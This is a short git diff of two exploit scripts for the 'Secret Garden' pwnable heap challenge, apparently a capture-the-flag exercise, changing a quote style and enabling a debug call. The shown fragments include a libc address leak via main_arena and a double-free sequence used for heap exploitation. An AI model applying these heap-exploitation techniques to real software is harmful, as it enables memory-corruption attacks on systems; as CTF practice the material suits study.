diff --git a/pwnable_Secret_Garden/fileStruct.py b/pwnable_Secret_Garden/fileStruct.py index 8ad8d602..6111ea31 100644 --- a/pwnable_Secret_Garden/fileStruct.py +++ b/pwnable_Secret_Garden/fileStruct.py @@ -77,7 +77,7 @@ def Remove(idx): # DEBUG([0xCD3], True) Raise(0x90, '3' * 0x8) Visit() - libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\0')) - 88 - mainArena + libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, "\0")) - 88 - mainArena success("libc.address", libc.address) pause() diff --git a/pwnable_Secret_Garden/mallocHook.py b/pwnable_Secret_Garden/mallocHook.py index a11b99b8..fe06f2a6 100644 --- a/pwnable_Secret_Garden/mallocHook.py +++ b/pwnable_Secret_Garden/mallocHook.py @@ -80,7 +80,7 @@ def Remove(idx): Remove(1) # 1 Remove(2) # 2 -> 1 - # DEBUG([0xE74], True) + DEBUG([0xE74], True) Remove(1) # 1 -> 2 -> 1 # DEBUG([0xCD3], True)